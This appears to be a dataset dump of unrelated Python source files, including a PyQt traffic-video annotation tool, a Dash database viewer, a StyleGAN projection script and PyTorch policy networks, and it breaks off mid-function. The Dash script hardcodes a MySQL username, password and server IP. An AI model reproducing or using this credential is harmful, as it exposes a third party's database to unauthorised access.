text stringlengths 38 1.54M |
|---|
from sys import argv
def load_input(splitstring = "\n"):
if len(argv) > 1:
filename = "examples.txt"
print("Using test cases...\n")
else:
filename = "input.txt"
print("Using input...\n")
with open(filename, "r") as f:
return list(filter(bool, f.read().split(splitstring)))
def load_raw():
if len(argv) > 1:
filename = "examples.txt"
print("Using test cases...\n")
else:
filename = "input.txt"
print("Using input...\n")
with open(filename, "r") as f:
return f.read()
|
from werkzeug.exceptions import Conflict, NotFound, Unauthorized
class JSONException(Exception):
"""Custom JSON based exception.
:param status_code: response status_code
:param message: exception message
"""
status_code = NotFound.code
message = ''
def __init__(self, message=None, status_code=None):
Exception.__init__(self)
if message is not None:
self.message = message
if status_code is not None:
self.status_code = status_code
def to_dict(self):
return {
'code': self.status_code,
'message': self.message,
'error': {
'type': str(self.__class__.__name__)
}
}
class ValidationFailed(JSONException):
status_code = 400
message = "Request validation failed"
class InvalidContentType(JSONException):
"""
Raised when an invalid Content-Type is provided.
"""
pass
class InvalidPermissions(JSONException):
status_code = Unauthorized.code
class InvalidRequestException(JSONException):
status_code = 500
message = "Invalid Request please submit all the required data"
class InvalidAPIRequest(JSONException):
"""
Raised when an invalid request has been made.
(e.g. accessed unexisting url, the schema validation did
not pass)
"""
pass
class DatabaseError(JSONException):
"""
Generic database interaction error.
Inherit this error for all subsequent
errors that are related to database.
"""
pass
class RecordNotFound(DatabaseError):
"""
Raised when the record was not found in the database.
"""
pass
class RecordAlreadyExists(DatabaseError):
"""
Raised in the case of violation of a unique constraint.
"""
status_code = Conflict.code
class NotAValidFileName(JSONException):
status_code = 500
message = "Invalid file name"
|
from UI.MainWindow import Ui_MainWindow
from PyQt5.QtWidgets import *
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from UI.proc import proc
import cv2
import time
import os
# from interface.Detection import detector
class ui(QMainWindow, Ui_MainWindow):
def __init__(self):
super(ui, self).__init__()
self.setupUi(self)
self.x1, self.x2 = 0, 0
self.y1, self.y2 = 0, 0
self.lines = []
self.files = []
self.font_font = cv2.FONT_HERSHEY_SCRIPT_SIMPLEX
self.font_size = 4
self.line_gap = 15
self.is_drawing = False
self.is_clicked = False
self.show_frame = None
self.save_file = "."
self.video_capture = cv2.VideoCapture()
self.model_path = "/home/szk/PycharmProjects/pytorch-retinanet/saved/resnet50_vehicle_39.pt"
# self.files = ["/data/00_share/4天视频/01 227省道、东港路(4天)/4.9/227省道、东港路西北角_227省道、东港路西北角_20180409070000.mp4"]
# self.lines.append([484, 385, 1606, 832])
# self.lines.append([282, 490, 1139, 851])
self.pushButton.clicked.connect(self.open_video)
self.pushButton_2.clicked.connect(self.add_video)
self.pushButton_3.clicked.connect(self.draw_line)
self.pushButton_4.clicked.connect(self.save_config)
self.pushButton_5.clicked.connect(self.delete_line)
self.pushButton_6.clicked.connect(self.run)
self.pushButton_7.clicked.connect(self.choose_model)
# self.show()
def open_video(self):
print("=> OPEN VIDEO!")
filename, _ = QFileDialog.getOpenFileName(self,
"打开文件",
".",
"mp4 Files(*.mp4);;ALL Files(*)")
if filename == '':
self.show_messages(['警告', '没有选择文件!'])
else:
print(filename)
self.video_capture.open(filename)
ret, frame = self.video_capture.read()
self.show_frame = frame
height, width = frame.shape[:2]
if frame.ndim == 3:
rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
else:
rgb = cv2.cvtColor(frame, cv2.COLOR_GRAY2BGR)
image = QImage(rgb.flatten(), width, height, QImage.Format_RGB888)
image = image.scaled(self.label.width(), self.label.height(), Qt.KeepAspectRatio)
self.label.setPixmap(QPixmap.fromImage(image))
def add_video(self):
print("=> ADD VIDEO!")
filenames, _ = QFileDialog.getOpenFileNames(self,
"打开文件",
".",
"mp4 Files(*.mp4);;ALL Files(*)")
self.textBrowser.setText("选择视频:")
for fn in filenames:
if fn not in self.files:
self.files.append(fn)
for file in self.files:
print(file)
self.textBrowser.append(file)
def choose_model(self):
print("=> CHOOSE MODEL!")
filename, _ = QFileDialog.getOpenFileName(self,
"打开文件",
".",
"pth Files(*.pth);pt Files(*.pt);;ALL Files(*)")
if filename == '':
self.show_messages(['警告', '没有选择文件!'])
else:
print(filename)
self.model_path = filename
def save_config(self):
if len(self.lines) == 0:
self.show_messages(['Warning', "Please draw lines first!"])
return
elif len(self.files) == 0:
self.show_messages(['Warning', "Please add videos first!"])
return
filename = QFileDialog.getExistingDirectory(self,
"Save",
"/data/yxy/")
if filename == "":
print("...")
else:
self.save_file = filename
def draw_line(self):
if self.video_capture is None:
self.show_messages(['警告!', "请先添加视频!"])
self.is_drawing = True
print("=> start draw line")
def delete_line(self):
if len(self.lines) > 0:
self.lines.pop()
else:
self.show_messages(['警告!', '没有线条可以删除!'])
temp = self.show_frame.copy()
height, width = temp.shape[:2]
for i in range(len(self.lines)):
x1, y1, x2, y2 = self.lines[i]
cv2.line(temp, (x1, y1), (x2, y2), (0, 0, 255), 5)
cv2.putText(temp, str(i + 1), (x1, y1 - self.line_gap),
self.font_font, self.font_size, (0, 0, 255), 2)
if temp.ndim == 3:
rgb = cv2.cvtColor(temp, cv2.COLOR_BGR2RGB)
else:
rgb = cv2.cvtColor(temp, cv2.COLOR_GRAY2BGR)
image = QImage(rgb.flatten(), width, height, QImage.Format_RGB888)
image = image.scaled(self.label.width(), self.label.height(), Qt.KeepAspectRatio)
self.label.setPixmap(QPixmap.fromImage(image))
def set_pos(self, height, width):
x1 = int(self.x1 / self.label.width() * width)
y1 = int(self.y1 / self.label.height() * height)
x2 = int(self.x2 / self.label.width() * width)
y2 = int(self.y2 / self.label.height() * height)
return x1, y1, x2, y2
def paintEvent(self, event):
event.parent = self.label
if self.is_drawing and self.is_clicked:
temp = self.show_frame.copy()
height, width = temp.shape[:2]
temp = cv2.resize(temp, (width, height))
# draw old lines
for i in range(len(self.lines)):
x1, y1, x2, y2 = self.lines[i]
cv2.line(temp, (x1, y1), (x2, y2), (0, 0, 255), 5)
cv2.putText(temp, str(i + 1), (x1, y1 - self.line_gap),
self.font_font, self.font_size, (0, 0, 255), 2)
# draw new line
x1, y1, x2, y2 = self.set_pos(height, width)
cv2.line(temp, (x1, y1), (x2, y2), (255, 0, 0), 5)
cv2.putText(temp, str(len(self.lines) + 1), (x1, y1 - self.line_gap),
self.font_font, self.font_size, (255, 0, 0), 2)
if temp.ndim == 3:
rgb = cv2.cvtColor(temp, cv2.COLOR_BGR2RGB)
else:
rgb = cv2.cvtColor(temp, cv2.COLOR_GRAY2BGR)
image = QImage(rgb.flatten(), width, height, QImage.Format_RGB888)
image = image.scaled(self.label.width(), self.label.height(), Qt.KeepAspectRatio)
self.label.setPixmap(QPixmap.fromImage(image))
def mousePressEvent(self, event):
if self.is_drawing:
self.is_clicked = True
self.x1 = event.pos().x()
self.y1 = event.pos().y()
def mouseMoveEvent(self, event):
if self.is_drawing:
self.x2 = event.pos().x()
self.y2 = event.pos().y()
self.update()
def mouseReleaseEvent(self, event):
if self.is_drawing:
self.is_drawing = False
self.is_clicked = False
temp = self.show_frame.copy()
height, width = temp.shape[:2]
for i in range(len(self.lines)):
x1, y1, x2, y2 = self.lines[i]
cv2.line(temp, (x1, y1), (x2, y2), (0, 0, 255), 5)
cv2.putText(temp, str(i + 1), (x1, y1 - self.line_gap),
self.font_font, self.font_size, (0, 0, 255), 2)
x1, y1, x2, y2 = self.set_pos(height, width)
cv2.line(temp, (x1, y1), (x2, y2), (0, 0, 255), 5)
cv2.putText(temp, str(len(self.lines) + 1), (x1, y1 - self.line_gap),
self.font_font, self.font_size, (0, 0, 255), 2)
if temp.ndim == 3:
rgb = cv2.cvtColor(temp, cv2.COLOR_BGR2RGB)
else:
rgb = cv2.cvtColor(temp, cv2.COLOR_GRAY2BGR)
image = QImage(rgb.flatten(), width, height, QImage.Format_RGB888)
image = image.scaled(self.label.width(), self.label.height(), Qt.KeepAspectRatio)
self.label.setPixmap(QPixmap.fromImage(image))
print("lines", [x1, y1, x2, y2])
self.lines.append([x1, y1, x2, y2])
def show_messages(self, msg):
QMessageBox.information(self, msg[0], msg[1], QMessageBox.Yes)
def write_flow(self, video, result):
file = os.path.join(self.save_file,
video.split("/")[-1].split(".")[0] + ".txt")
fp = open(file, "w")
print(result.shape)
fp.write("\t轿车\t公交车\t小型货车\t中型货车\t大型货车\t拖挂车\n")
for i in range(result.shape[1]):
for j in range(result.shape[2]):
if i == j:
continue
fp.write(str(i + 1) + "-" + str(j + 1) + "\t")
for category in range(result.shape[0]):
fp.write(str(result[category, i, j]) + "\t")
fp.write("\n")
return
def run(self):
self.textBrowser.append("开始处理视频:")
# load tf model
for video in self.files:
self.textBrowser.append(video + "处理中...")
t1 = time.time()
print(self.checkshow.isChecked())
result = proc(label=self.label,
video=video,
lines=self.lines,
model_path=self.model_path,
gap=self.spinBox.value(),
if_show=self.checkshow.isChecked())
t2 = time.time()
self.write_flow(video, result)
self.textBrowser.append("{:d} minutes".format(int((t2 - t1) / 60)))
self.textBrowser.append("处理完成...")
|
import pandas as pd
import dash
import dash_core_components as dcc
import dash_html_components as html
from sqlalchemy import create_engine
from dash.dependencies import Input, Output, State
import dash_table_experiments as dt
engine = create_engine("mysql+pymysql://eums:eums00!q@133.186.146.142:3306/eums-poi?charset=utf8mb4", encoding = 'utf8' ,
pool_size=20,pool_recycle=3600,connect_args={'connect_timeout':1000000} )
app = dash.Dash()
query = '''
select *
from TEMP0002
where state = "-1" '''
df = pd.read_sql_query(query, engine)
id_list = [id for id in df['ID']]
app.layout = html.Div([
html.Button(id='submit-button', n_clicks=0, children='업데이트', style={'fontSize': 15, 'height': 30}),
html.Div([dt.DataTable(rows=[{}], id='inner_table')], id='table', className="container",
style={'width': "100%", 'display': 'inline-block'})
])
@app.callback(
Output('table', 'children'),
[Input('submit-button', 'n_clicks')])
def get_table(n_clicks):
return dt.DataTable(
rows=df.to_dict('records'),
columns=df.columns,
row_selectable=True,
filterable=True,
sortable=True,
editable={'ADDR': False, 'ID': False, 'CO_NAME': False, 'LATITUDE': False, 'LONGITUDE': False, 'REP_PHONE_NUM': False, 'STATE': False},
selected_row_indices=[],
resizable=True,
max_rows_in_viewport=10,
min_width=2000,
id='inner_table'
)
if __name__ == '__main__':
app.run_server(debug=True) |
import sys
def validate_empty_fields(data, field):
if not data:
print(f"ERROR: '{data}' is not a valid {field}!")
sys.exit(1)
validate_empty_fields('{{ cookiecutter.project_short_description }}', "project_short_description")
|
import requests
from bs4 import BeautifulSoup
url = "https://www.nba.com/players/jalen/adams/1629824"
html = requests.get(url)
soup = BeautifulSoup(html.text,'lxml')
hight = soup.find_all('p', string='\n HEIGHT\n ')
print(hight)
# url = 'HEIGHT
# ' |
import os
import json
from renjuu.game.const import Color
class Scoreboard:
def __init__(self, filename):
self.filename = filename
@staticmethod
def parse_data(data):
text = "Score table\n"
for key in data:
text += "%s : %s \n" % (key, data[key])
return text
@staticmethod
def stat_increment(data: dict, win_color: Color, players: list):
if win_color == Color.non:
for player in players:
data[player.color.name] += 1
else:
data[win_color.name] += 2
@staticmethod
def json_save(filename, data):
with open(filename, 'w+') as file:
json.dump(data, file)
def json_load(self, filename):
self.check_path_exist(filename)
with open(filename, 'r') as file:
return json.load(file)
def check_path_exist(self, filename):
if not os.path.exists(filename):
self.json_save(filename,
{color.name: 0 for color in Color
if color is not Color.non})
@staticmethod
def save(filename, text):
with open(filename, 'w+') as file:
file.write(text)
def update_stat(self, game):
data = self.json_load(self.filename + ".json")
self.stat_increment(data, game.winner, game.players)
text = self.parse_data(data)
self.json_save(self.filename + ".json", data)
self.save(self.filename + ".txt", text)
|
import argparse
import math
import os
import numpy as np
import torch
from PIL import Image
from torch import optim
from torch.nn import functional as F
from torch.utils import data
from torchvision import transforms
from tqdm import tqdm
from model import Generator
from train import data_sampler, sample_data
from utils import lpips
from utils.dataset import MultiResolutionDataset
def noise_regularize_(noises):
loss = 0
for noise in noises:
size = noise.shape[2]
while True:
loss = (
loss
+ (noise * torch.roll(noise, shifts=1, dims=3)).mean().pow(2)
+ (noise * torch.roll(noise, shifts=1, dims=2)).mean().pow(2)
)
if size <= 8:
break
noise = noise.reshape([-1, 1, size // 2, 2, size // 2, 2])
noise = noise.mean([3, 5])
size //= 2
return loss
def noise_normalize_(noises):
for noise in noises:
mean = noise.mean()
std = noise.std()
noise.data.add_(-mean).div_(std)
def get_lr(t, initial_lr, rampdown=0.25, rampup=0.05):
lr_ramp = min(1, (1 - t) / rampdown)
lr_ramp = 0.5 - 0.5 * math.cos(lr_ramp * math.pi)
lr_ramp = lr_ramp * min(1, t / rampup)
return initial_lr * lr_ramp
def latent_noise(latent, strength):
noise = torch.randn_like(latent) * torch.unsqueeze(strength, -1)
return latent + noise
def make_image(tensor):
return (
tensor.detach()
.clamp_(min=-1, max=1)
.add(1)
.div_(2)
.mul(255)
.type(torch.uint8)
.permute(0, 2, 3, 1)
.to('cpu')
.numpy()
)
if __name__ == '__main__':
device = 'cuda'
parser = argparse.ArgumentParser()
parser.add_argument('--ckpt', type=str, required=True)
parser.add_argument('--dataset', type=str, required=True)
parser.add_argument('--size', type=int, default=256)
parser.add_argument('--lr_rampup', type=float, default=0.05)
parser.add_argument('--lr_rampdown', type=float, default=0.25)
parser.add_argument('--lr', type=float, default=0.1)
parser.add_argument('--noise', type=float, default=0.05)
parser.add_argument('--noise_ramp', type=float, default=0.75)
parser.add_argument('--step', type=int, default=1000)
parser.add_argument('--noise_regularize', type=float, default=1e5)
parser.add_argument('--mse', type=float, default=0)
parser.add_argument('--batch', type=int, default=8)
parser.add_argument('--output_dir', type=str, default='./projection')
args = parser.parse_args()
n_mean_latent = 10000
args.latent = 512
args.token = 2 * (int(math.log(args.size, 2)) - 1)
args.n_mlp = 8
args.w_space = False
resize = min(args.size, 256)
transform = transforms.Compose(
[
transforms.Resize(resize),
transforms.CenterCrop(resize),
transforms.ToTensor(),
transforms.Normalize([0.5, 0.5, 0.5], [0.5, 0.5, 0.5]),
]
)
dataset = MultiResolutionDataset(args.dataset, transform, args.size)
loader = data.DataLoader(
dataset,
batch_size=args.batch,
sampler=data_sampler(dataset, shuffle=True, distributed=False),
drop_last=True,
)
loader = sample_data(loader)
imgs = next(loader).to(device)
g_ema = Generator(args.size, args.latent, args.token, args.n_mlp, w_space=args.w_space)
g_ema.load_state_dict(torch.load(args.ckpt)['g_ema'])
g_ema.eval()
g_ema = g_ema.to(device)
with torch.no_grad():
noise_sample = torch.randn(n_mean_latent, args.token, args.latent, device=device)
noise_sample = torch.cat([noise_sample, g_ema.token.repeat(noise_sample.size()[0], 1, 1)], 2)
latent_out = g_ema.style(noise_sample)
latent_mean = latent_out.mean(0)
latent_std = ((latent_out - latent_mean).pow(2).sum([0, 2]) / n_mean_latent) ** 0.5
percept = lpips.PerceptualLoss(
model='net-lin', net='vgg', use_gpu=device.startswith('cuda')
)
noise_single = g_ema.make_noise()
noises = []
for noise in noise_single:
noises.append(noise.repeat(args.batch, 1, 1, 1).normal_())
latent_in = latent_mean.detach().clone().unsqueeze(0).repeat(args.batch, 1, 1)
latent_in.requires_grad = True
for noise in noises:
noise.requires_grad = True
optimizer = optim.Adam([latent_in] + noises, lr=args.lr)
pbar = tqdm(range(args.step))
latent_path = []
perceptual_values = []
noise_values = []
mse_values = []
for i in pbar:
t = i / args.step
lr = get_lr(t, args.lr, rampdown=args.lr_rampdown, rampup=args.lr_rampup)
optimizer.param_groups[0]['lr'] = lr
noise_strength = latent_std * args.noise * max(0, 1 - t / args.noise_ramp) ** 2
latent_n = latent_noise(latent_in, noise_strength)
img_gen, _ = g_ema(latent_n, input_is_latent=True, noise=noises)
batch, channel, height, width = img_gen.shape
if height > 256:
factor = height // 256
img_gen = img_gen.reshape(
batch, channel, height // factor, factor, width // factor, factor
)
img_gen = img_gen.mean([3, 5])
p_loss = percept(img_gen, imgs).sum()
n_loss = noise_regularize_(noises)
mse_loss = F.mse_loss(img_gen, imgs)
loss = p_loss + args.noise_regularize * n_loss + args.mse * mse_loss
optimizer.zero_grad()
loss.backward()
optimizer.step()
noise_normalize_(noises)
if (i + 1) % 100 == 0:
latent_path.append(latent_in.detach().clone())
if (i + 1) % 10 == 0:
perceptual_values.append(p_loss.item())
noise_values.append(n_loss.item())
mse_values.append(mse_loss.item())
pbar.set_description(
(
f'perceptual: {p_loss.item():.4f}; noise regularize: {n_loss.item():.4f};'
f' mse: {mse_loss.item():.4f}; lr: {lr:.4f}'
)
)
img_gen, _ = g_ema(latent_path[-1], input_is_latent=True, noise=noises)
img_or = make_image(imgs)
img_ar = make_image(img_gen)
os.makedirs(args.output_dir, exist_ok=True)
np.save(os.path.join(args.output_dir, f'latents.npy'), latent_path[-1].cpu().numpy())
np.save(os.path.join(args.output_dir, f'perceptual.npy'), perceptual_values)
np.save(os.path.join(args.output_dir, f'noise.npy'), noise_values)
np.save(os.path.join(args.output_dir, f'mse.npy'), mse_values)
for i in range(args.batch):
img1 = Image.fromarray(img_or[i])
img1.save(os.path.join(args.output_dir, f'origin_{i}.png'))
img2 = Image.fromarray(img_ar[i])
img2.save(os.path.join(args.output_dir, f'project_{i}.png'))
|
##
# base exceptions
##
# base exception
class BaseException(Exception):
def __init__(self, *args, **kwargs):
super(BaseException, self).__init__(args, kwargs)
# db base exception
class DbBaseException(BaseException):
def __init__(self, *args, **kwargs):
super(DbBaseException, self).__init__(args, kwargs)
# db email base exception
class DbEmailBaseException(DbBaseException):
def __init__(self, *args, **kwargs):
super(DbEmailBaseException, self).__init__(args, kwargs)
# model base exception
class ModelBaseException(BaseException):
def __init__(self, *args, **kwargs):
super(ModelBaseException, self).__init__(args, kwargs)
# model email base exception
class ModelEmailBaseException(ModelBaseException):
def __init__(self, *args, **kwargs):
super(ModelEmailBaseException, self).__init__(args, kwargs)
# model indexer base exception
class ModelIndexerBaseException(ModelBaseException):
def __init__(self, *args, **kwargs):
super(ModelIndexerBaseException, self).__init__(args, kwargs)
# model indexer_to_email base exception
class ModelIndexerToEmailBaseException(ModelBaseException):
def __init__(self, *args, **kwargs):
super(ModelIndexerToEmailBaseException, self).__init__(args, kwargs)
# loader base exception
class LoaderBaseException(BaseException):
def __init__(self, *args, **kwargs):
super(LoaderBaseException, self).__init__(args, kwargs)
# loader email base exception
class LoaderEmailBaseException(LoaderBaseException):
def __init__(self, *args, **kwargs):
super(LoaderEmailBaseException, self).__init__(args, kwargs)
# helper base exception
class HelperBaseException(BaseException):
def __init__(self, *args, **kwargs):
super(HelperBaseException, self).__init__(args, kwargs)
##
# exceptions
##
# db email exceptions
class DbEmailDirNotExistsException(DbEmailBaseException):
def __init__(self, *args, **kwargs):
super(DbEmailDirNotExistsException, self).__init__(args, kwargs)
class DbEmailLabelFileNotExistsException(DbEmailBaseException):
def __init__(self, *args, **kwargs):
super(DbEmailLabelFileNotExistsException, self).__init__(args, kwargs)
class DbEmailCreatingTableErrorException(DbEmailBaseException):
def __init__(self, *args, **kwargs):
super(DbEmailCreatingTableErrorException, self).__init__(args, kwargs)
class DbEmailInsertingTableErrorException(DbEmailBaseException):
def __init__(self, *args, **kwargs):
super(DbEmailInsertingTableErrorException, self).__init__(args, kwargs)
# model email exceptions
class ModelEmailLabelInvalidException(ModelEmailBaseException):
def __init__(self, *args, **kwargs):
super(ModelEmailLabelInvalidException, self).__init__(args, kwargs)
class ModelEmailFileNotExistsException(ModelEmailBaseException):
def __init__(self, *args, **kwargs):
super(ModelEmailFileNotExistsException, self).__init__(args, kwargs)
class ModelEmailEncodingIncorrectException(ModelEmailBaseException):
def __init__(self, *args, **kwargs):
super(ModelEmailEncodingIncorrectException, self).__init__(args, kwargs)
class ModelEmailParsingErrorException(ModelEmailBaseException):
def __init__(self, *args, **kwargs):
super(ModelEmailParsingErrorException, self).__init__(args, kwargs)
# loader email exceptions
class LoaderEmailDataDirNotExistsException(LoaderEmailBaseException):
def __init__(self, *args, **kwargs):
super(LoaderEmailDataDirNotExistsExceptionn, self).__init__(args, kwargs)
class LoaderEmailLabelsInvalidException(LoaderEmailBaseException):
def __init__(self, *args, **kwargs):
super(LoaderEmailLabelsInvalidException, self).__init__(args, kwargs)
class LoaderEmailDbConnectionInvalidException(LoaderEmailBaseException):
def __init__(self, *args, **kwargs):
super(LoaderEmailDbConnectionInvalidException, self).__init__(args, kwargs)
# helper exceptions
class HelperEmailLabelFileNotExistsException(HelperBaseException):
def __init__(self, *args, **kwargs):
super(HelperEmailLabelFileNotExistsException, self).__init__(args, kwargs) |
import torch.nn as nn
from torch.distributions import Normal
import torch
import numpy as np
class MLPPolicy(nn.Module):
def __init__(self, state_dim, action_dim):
super(MLPPolicy, self).__init__()
self.fc1 = nn.Linear(state_dim, 100)
self.relu1 = nn.ReLU()
self.fc_mean = nn.Linear(100, action_dim)
self.tanh = nn.Tanh()
self.fc_std = nn.Linear(100, action_dim)
self.sigmoid = nn.Softplus()
nn.init.kaiming_normal_(self.fc1.weight.data)
nn.init.xavier_normal_(self.fc_mean.weight.data)
nn.init.xavier_normal_(self.fc_std.weight.data)
def forward(self, x):
x = self.fc1(x)
x = self.relu1(x)
mean = self.tanh(self.fc_mean(x))
std = self.sigmoid(self.fc_std(x)) + 1e-5
return mean, std
def choose_action(self, state):
mean, std = self.forward(state)
dis = Normal(mean, std)
return dis.sample().numpy()
class MLPValue(nn.Module):
def __init__(self, state_dim):
super(MLPValue, self).__init__()
self.fc1 = nn.Linear(state_dim, 100)
self.relu = nn.ReLU()
self.fc2 = nn.Linear(100, 1)
self.tanh = nn.Tanh()
nn.init.kaiming_normal_(self.fc1.weight.data)
nn.init.xavier_normal_(self.fc2.weight.data)
def forward(self, x):
x = self.fc1(x)
x = self.relu(x)
x = self.fc2(x)
return x
class MLPRotation(nn.Module):
def __init__(self, state_dim, action_dim):
super(MLPRotation, self).__init__()
self.fc1 = nn.Linear(state_dim, 100)
self.relu1 = nn.ReLU()
self.fc_mean = nn.Linear(100, action_dim)
self.tanh = nn.Tanh()
self.fc_std = nn.Linear(100, action_dim)
self.sigmoid = nn.Softplus()
nn.init.kaiming_normal_(self.fc1.weight.data)
nn.init.xavier_normal_(self.fc_mean.weight.data)
nn.init.xavier_normal_(self.fc_std.weight.data)
def forward(self, x):
x = self.fc1(x)
x = self.relu1(x)
mean = self.tanh(self.fc_mean(x))
std = self.sigmoid(self.fc_std(x)) + 1e-5
return mean, std
def choose_action(self, state):
mean, std = self.forward(state)
dis = Normal(mean, std)
return dis.sample().numpy()
class MLPRotationValue(nn.Module):
def __init__(self, state_dim):
super(MLPRotationValue, self).__init__()
self.fc1 = nn.Linear(state_dim, 100)
self.relu = nn.ReLU()
self.fc2 = nn.Linear(100, 1)
self.tanh = nn.Tanh()
nn.init.kaiming_normal_(self.fc1.weight.data)
nn.init.xavier_normal_(self.fc2.weight.data)
def forward(self, x):
x = self.fc1(x)
x = self.relu(x)
x = self.fc2(x)
return x
class CNNPolicy(nn.Module):
def __init__(self, action_dim):
super(CNNPolicy, self).__init__()
self.conv1 = nn.Conv2d(1, 32, kernel_size=6, stride=2) # 224 * 224 * 1 -> 110 * 110 * 32
self.relu1 = nn.ReLU()
self.maxpool = nn.MaxPool2d(kernel_size=2) # 110 * 110 * 32 -> 55 * 55 * 32
self.conv2 = nn.Conv2d(32, 64, kernel_size=3, stride=1, padding=1) # 55 * 55 * 32 -> 55 * 55 * 64
self.relu2 = nn.ReLU()
self.conv3 = nn.Conv2d(64, 64, kernel_size=5, stride=2) # 55 * 55 * 64 -> 26 * 26 * 64
self.relu3 = nn.ReLU()
self.fc1 = nn.Linear(26 * 26 * 64, 1024)
self.relu4 = nn.ReLU()
self.fc2 = nn.Linear(1024, 64)
self.relu5 = nn.ReLU()
self.fc_mean = nn.Linear(64 + 2, action_dim) # +3 for 3d position input
self.tanh = nn.Tanh()
self.fc_std = nn.Linear(64 + 2, action_dim)
self.sigmoid = nn.Softplus()
nn.init.kaiming_normal_(self.conv1.weight.data)
nn.init.kaiming_normal_(self.conv2.weight.data)
nn.init.kaiming_normal_(self.conv3.weight.data)
nn.init.kaiming_normal_(self.fc1.weight.data)
nn.init.kaiming_normal_(self.fc2.weight.data)
nn.init.xavier_normal_(self.fc_mean.weight.data)
nn.init.xavier_normal_(self.fc_std.weight.data)
def forward(self, x, position):
x = self.conv1(x)
x = self.relu1(x)
x = self.maxpool(x)
x = self.conv2(x)
x = self.relu2(x)
x = self.conv3(x)
x = self.relu3(x)
x = self.fc1(x.view(x.size(0), -1))
x = self.relu4(x)
x = self.fc2(x)
x = self.relu5(x)
x = torch.cat((x, position), 1)
mean = self.tanh(self.fc_mean(x))
std = self.sigmoid(self.fc_std(x)) + 1e-5
return mean, std
def choose_action(self, state):
mean, std = self.forward(state)
dis = Normal(mean, std)
return dis.sample().numpy()
def get_feature64(self, x):
with torch.no_grad():
x = self.conv1(x)
x = self.relu1(x)
x = self.maxpool(x)
x = self.conv2(x)
x = self.relu2(x)
x = self.conv3(x)
x = self.relu3(x)
x = self.fc1(x.view(x.size(0), -1))
x = self.relu4(x)
x = self.fc2(x)
return x
def get_feature1024(self, x):
with torch.no_grad():
x = self.conv1(x)
x = self.relu1(x)
x = self.maxpool(x)
x = self.conv2(x)
x = self.relu2(x)
x = self.conv3(x)
x = self.relu3(x)
x = self.fc1(x.view(x.size(0), -1))
return x
class CNNRotationSup224(nn.Module):
def __init__(self, action_dim=1):
super(CNNRotationSup224, self).__init__()
self.conv1 = nn.Conv2d(1, 32, kernel_size=6, stride=2) # 224 * 224 * 1 -> 110 * 110 * 32
self.relu1 = nn.ReLU()
self.maxpool = nn.MaxPool2d(kernel_size=2) # 110 * 110 * 32 -> 55 * 55 * 32
self.conv2 = nn.Conv2d(32, 64, kernel_size=3, stride=1, padding=1) # 55 * 55 * 32 -> 55 * 55 * 64
self.relu2 = nn.ReLU()
self.conv2_2 = nn.Conv2d(64, 64, kernel_size=3, stride=1, padding=1) # 55 * 55 * 64 -> 55 * 55 * 64
self.relu2_2 = nn.ReLU()
self.conv3 = nn.Conv2d(64, 64, kernel_size=5, stride=2) # 55 * 55 * 64 -> 26 * 26 * 64
self.relu3 = nn.ReLU()
self.fc1 = nn.Linear(26 * 26 * 64, 1024)
self.relu4 = nn.ReLU()
self.fc2 = nn.Linear(1024, 64)
self.relu5 = nn.ReLU()
self.fc_mean = nn.Linear(64, action_dim) # +3 for 3d position input
self.tanh = nn.Tanh()
nn.init.xavier_normal_(self.conv1.weight.data)
nn.init.xavier_normal_(self.conv2.weight.data)
nn.init.xavier_normal_(self.conv2_2.weight.data)
nn.init.xavier_normal_(self.conv3.weight.data)
nn.init.xavier_normal_(self.fc1.weight.data)
nn.init.xavier_normal_(self.fc2.weight.data)
nn.init.xavier_normal_(self.fc_mean.weight.data)
nn.init.zeros_(self.conv1.bias)
nn.init.zeros_(self.conv2.bias)
nn.init.zeros_(self.conv2_2.bias)
nn.init.zeros_(self.conv3.bias)
nn.init.zeros_(self.fc1.bias)
nn.init.zeros_(self.fc2.bias)
nn.init.zeros_(self.fc_mean.bias)
def forward(self, x):
# torch.set_printoptions(threshold=np.inf)
x = self.conv1(x)
# x.register_hook(lambda g: print('model x1 before gradient: ', g))
x = self.relu1(x)
# x.register_hook(lambda g: print('model x1 gradient: ', g))
x = self.maxpool(x)
x = self.conv2(x)
x = self.relu2(x)
# x.register_hook(lambda g: print('model x2 gradient: ', g))
X = self.conv2_2(x)
x = self.relu2_2(x)
# x.register_hook(lambda g: print('model x3 gradient: ', g))
x = self.conv3(x)
x = self.relu3(x)
# x.register_hook(lambda g: print('model x4 gradient: ', g))
x = self.fc1(x.view(x.size(0), -1))
x = self.relu4(x)
# x.register_hook(lambda g: print('model x5 gradient: ', g))
x = self.fc2(x)
x = self.relu5(x)
# x.register_hook(lambda g: print('model x6 gradient: ', g))
mean = self.tanh(self.fc_mean(x))
# mean.register_hook(lambda g: print('model mean gradient: ', g))
mean = mean * np.pi
return mean
def get_feature(self):
pass
class MLPPolicy64(nn.Module):
def __init__(self, state_dim=64, action_dim=2):
super(MLPPolicy64, self).__init__()
self.fc1 = nn.Linear(state_dim+2, 100)
self.relu1 = nn.ReLU()
self.fc_mean = nn.Linear(100, action_dim)
self.tanh = nn.Tanh()
self.fc_std = nn.Linear(100, action_dim)
self.sigmoid = nn.Softplus()
nn.init.kaiming_normal_(self.fc1.weight.data)
nn.init.xavier_normal_(self.fc_mean.weight.data)
nn.init.xavier_normal_(self.fc_std.weight.data)
def forward(self, x, pos):
x = torch.cat((x, pos), 1)
x = self.fc1(x)
x = self.relu1(x)
mean = self.tanh(self.fc_mean(x))
std = self.sigmoid(self.fc_std(x)) + 1e-5
return mean, std
def choose_action(self, state):
mean, std = self.forward(state)
dis = Normal(mean, std)
return dis.sample().numpy()
class MLPValue64(nn.Module):
def __init__(self, state_dim=64):
super(MLPValue64, self).__init__()
self.fc1 = nn.Linear(state_dim+2, 100)
self.relu = nn.ReLU()
self.fc2 = nn.Linear(100, 1)
self.tanh = nn.Tanh()
nn.init.kaiming_normal_(self.fc1.weight.data)
nn.init.xavier_normal_(self.fc2.weight.data)
def forward(self, x, pos):
x = torch.cat((x, pos), 1)
x = self.fc1(x)
x = self.relu(x)
x = self.fc2(x)
return x
class MLPPolicy1024(nn.Module):
def __init__(self, state_dim=1024, action_dim=2):
super(MLPPolicy1024, self).__init__()
self.fc1 = nn.Linear(state_dim+2, 100)
self.relu1 = nn.ReLU()
self.fc_mean = nn.Linear(100, action_dim)
self.tanh = nn.Tanh()
self.fc_std = nn.Linear(100, action_dim)
self.sigmoid = nn.Softplus()
nn.init.kaiming_normal_(self.fc1.weight.data)
nn.init.xavier_normal_(self.fc_mean.weight.data)
nn.init.xavier_normal_(self.fc_std.weight.data)
def forward(self, x, pos):
